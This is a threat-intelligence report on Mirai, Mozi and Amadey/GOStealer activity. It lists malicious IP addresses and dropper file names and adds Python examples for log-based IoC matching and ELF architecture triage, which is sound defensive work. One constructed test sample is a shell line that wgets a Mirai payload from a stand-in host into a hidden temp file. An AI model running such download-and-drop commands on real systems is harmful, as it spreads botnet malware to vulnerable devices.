During the 24-hour period from May 24-25, 2026, threat intelligence monitoring identified 49 malicious infrastructure indicators, representing a focused IoT botnet and information stealer campaign. The threat landscape was dominated by Mirai and Mozi botnet variants targeting Linux-based IoT devices across multiple architectures, alongside Amadey dropper activity deploying GOStealer information stealing malware on Windows systems.
The most significant threat activity involved widespread Mirai botnet infrastructure at IP 85.239.151.41, hosting 34 distinct malware payloads targeting ARM, MIPS, x86, PowerPC, SPARC, and other architectures. Mozi botnet activity remained persistent with 10 compromised hosts actively distributing malware. GOStealer campaigns leveraged Amadey as a dropper mechanism, indicating organized credential harvesting operations. All observed activity aligns with commodity malware distribution patterns typical of automated botnet operations.
No critical vulnerabilities, KEV additions, or RSS-sourced threat intelligence were reported during this period. The threat environment reflects ongoing IoT exploitation and credential theft campaigns rather than emerging zero-day or sophisticated APT activity. Organizations should prioritize IoT device hardening, network segmentation, and endpoint detection capabilities to mitigate these persistent commodity threats.
Extensive Mirai botnet infrastructure identified hosting multi-architecture payloads for IoT device compromise
Active Mirai botnet command infrastructure hosting 34 distinct ELF payloads targeting ARM, MIPS, x86, PowerPC, SPARC, SuperH, ARC, and m68k architectures. Uses wget-based download scripts (opendir variant) for automated propagation across vulnerable IoT devices.
IP 45.198.224.38 distributing a Mirai MIPS payload, likely part of a coordinated botnet expansion campaign.
Persistent Mozi P2P botnet infrastructure targeting ARM and MIPS IoT devices
Ten compromised hosts (117.26.208.187, 27.206.90.87, 182.113.38.82, 116.139.99.165, 42.237.50.191, 182.119.231.15, 125.40.121.239, 222.127.226.53, 110.39.247.200) actively distributing Mozi botnet payloads via bin.sh scripts. Targets 32-bit ARM and MIPS architectures commonly found in routers and IoT devices.
GOStealer malware distribution via Amadey dropper framework
Windows-based information stealer campaign using Amadey as the initial dropper from IP 91.92.242.236. Multiple file variants (ace28c8550a31cc6.exe, 7d8f95cb60bbcf0f.exe) were identified. GOStealer targets credentials, browser data, and system information for exfiltration.
Secondary Amadey dropper activity at 62.60.226.140 with automated C2 monitoring capabilities, indicating active command and control infrastructure for payload distribution.
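As an added example that is not part of the report, the following Python matcher turns the indicators from the Mirai, Mozi and Amadey/GOStealer sections above into a small detection pass over proxy log lines. The IP addresses and the two dropper file names are those listed in the report; the log format, the internal client addresses, the timestamps and the URL paths are constructed assumptions for illustration.

```python
import re

# Indicators copied from the report sections above, grouped by family.
MIRAI_IPS = {"85.239.151.41", "45.198.224.38"}
MOZI_IPS = {
    "117.26.208.187", "27.206.90.87", "182.113.38.82", "116.139.99.165",
    "42.237.50.191", "182.119.231.15", "125.40.121.239", "222.127.226.53",
    "110.39.247.200",
}
AMADEY_IPS = {"91.92.242.236", "62.60.226.140"}
STEALER_FILES = {"ace28c8550a31cc6.exe", "7d8f95cb60bbcf0f.exe"}

IOC_FAMILY = {ip: "Mirai" for ip in MIRAI_IPS}
IOC_FAMILY.update({ip: "Mozi" for ip in MOZI_IPS})
IOC_FAMILY.update({ip: "Amadey/GOStealer" for ip in AMADEY_IPS})

# Constructed sample log lines (assumed format: epoch client method url status).
# Internal client addresses, timestamps and URL paths are illustrative, not from the report.
SAMPLE_LOG = """\
1779900000.123 10.0.0.5 GET http://85.239.151.41/bins/mirai.mips 200
1779900001.456 10.0.0.9 GET http://intranet.example/index.html 200
1779900002.789 10.0.0.7 GET http://42.237.50.191/bin.sh 200
1779900003.001 10.0.0.12 GET http://91.92.242.236/ace28c8550a31cc6.exe 200
1779900004.002 10.0.0.3 GET http://203.0.113.8/update.bin 200
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)
URL_RE = re.compile(r"^[a-z]+://(?P<host>[^/:]+)(?::\d+)?(?P<path>/\S*)?$")


def classify(line):
    """Return a hit record for one log line, or None when nothing matches."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    u = URL_RE.match(m["url"])
    if not u:
        return None
    host, path = u["host"], u["path"] or "/"
    filename = path.rsplit("/", 1)[-1]
    reasons = []
    if host in IOC_FAMILY:
        reasons.append(f"known {IOC_FAMILY[host]} infrastructure")
    if filename in STEALER_FILES:
        reasons.append("GOStealer dropper file name")
    if filename == "bin.sh":
        reasons.append("bin.sh download script (Mozi-style)")
    if not reasons:
        return None
    # A host match is high confidence; a file-name-only match needs analyst review.
    severity = "high" if host in IOC_FAMILY else "medium"
    return {"ts": m["ts"], "src": m["src"], "host": host, "path": path,
            "severity": severity, "reasons": reasons}


def scan(log_text):
    """Scan a whole log and return the list of hits in order."""
    return [h for h in map(classify, log_text.splitlines()) if h]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["severity"].upper(), hit["src"], "->", hit["host"] + hit["path"],
              "|", "; ".join(hit["reasons"]))
```

The matcher keys on destination host first because the report's indicators are IP addresses; the bin.sh rule is deliberately scored lower on its own, since that file name also appears in legitimate traffic, and it is there to catch the same download-script pattern reaching a host not yet on the list.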
Observed attacker techniques and tooling across botnet and stealer campaigns
Threat actors compiled Mirai variants for 11+ processor architectures (ARM5/6/7, MIPS, x86, PowerPC, SPARC, SuperH, ARC, m68k) to maximize IoT device compromise reach. This demonstrates a mature cross-compilation build pipeline and a broad targeting strategy.
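Triage of a multi-architecture payload set like the one described above starts with establishing what each file is. The following Python helper is an added example, not code from the report or from any botnet tooling: it reads the ELF identification bytes and the e_machine field to label each sample's class, endianness and architecture, and separates wget-style download scripts from binaries. The sample set is constructed from header-only ELF images (no real malware); the file names and the script body are assumptions.

```python
import struct

# e_machine values from the ELF specification for the architectures the report names.
E_MACHINE = {
    0x02: "SPARC", 0x03: "x86", 0x04: "m68k", 0x08: "MIPS", 0x14: "PowerPC",
    0x15: "PowerPC64", 0x28: "ARM", 0x2A: "SuperH", 0x2B: "SPARC V9",
    0x2D: "ARC", 0x3E: "x86-64", 0x5D: "ARC Compact", 0xB7: "AArch64", 0xC3: "ARC Compact2",
}
ELF_CLASS = {1: "ELF32", 2: "ELF64"}
ELF_DATA = {1: "little-endian", 2: "big-endian"}
E_TYPE = {1: "relocatable", 2: "executable", 3: "shared object / PIE", 4: "core"}


def parse_elf_header(blob):
    """Describe class, endianness, type and machine of an ELF blob; None if not ELF."""
    if len(blob) < 20 or blob[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = blob[4], blob[5]
    if ei_class not in ELF_CLASS or ei_data not in ELF_DATA:
        return None
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", blob[16:20])
    return {
        "class": ELF_CLASS[ei_class],
        "endian": ELF_DATA[ei_data],
        "type": E_TYPE.get(e_type, f"unknown({e_type})"),
        "machine": E_MACHINE.get(e_machine, f"unknown(0x{e_machine:02x})"),
    }


def triage(blob):
    """Label a downloaded file as a download script, an ELF binary, or unknown."""
    if blob.startswith(b"#!"):
        interpreter = blob.split(b"\n", 1)[0][2:].strip().decode(errors="replace")
        fetches = b"wget" in blob or b"curl" in blob
        return {"kind": "download script" if fetches else "script", "interpreter": interpreter}
    header = parse_elf_header(blob)
    if header:
        return {"kind": "elf", **header}
    return {"kind": "unknown"}


def make_elf_header(ei_class, ei_data, e_machine, e_type=2):
    """Construct a header-only ELF image for testing (not a runnable executable)."""
    endian = "<" if ei_data == 1 else ">"
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1, 0]) + b"\x00" * 8
    if ei_class == 1:   # 52-byte ELF32 header: e_type .. e_shstrndx
        rest = struct.pack(endian + "HHIIIIIHHHHHH", e_type, e_machine, 1, 0, 0, 0, 0, 52, 0, 0, 0, 0, 0)
    else:               # 64-byte ELF64 header
        rest = struct.pack(endian + "HHIQQQIHHHHHH", e_type, e_machine, 1, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0)
    return ident + rest


# Constructed sample set standing in for the files an open directory would serve;
# the names are assumptions and the bodies are minimal headers only.
SAMPLES = {
    "mirai.mips": make_elf_header(1, 2, 0x08),    # ELF32, big-endian MIPS
    "mirai.arm7": make_elf_header(1, 1, 0x28),    # ELF32, little-endian ARM
    "mirai.ppc": make_elf_header(1, 2, 0x14),     # ELF32, big-endian PowerPC
    "mirai.x86_64": make_elf_header(2, 1, 0x3E),  # ELF64, little-endian x86-64
    "bin.sh": b"#!/bin/sh\nwget http://payload-host.invalid/mirai.mips -O /tmp/.m\n",
}


def architectures_covered(samples):
    """Sorted list of distinct architectures among the ELF samples."""
    return sorted({t["machine"] for t in map(triage, samples.values()) if t["kind"] == "elf"})


if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:14} {triage(blob)}")
    print("architectures:", architectures_covered(SAMPLES))
```

Reading only the first 20 bytes is enough for this classification, which matters when a directory holds dozens of files: the architecture list it produces is the one to compare against the device inventory, so defenders can see which of their routers, cameras and gateways the payload set was built for.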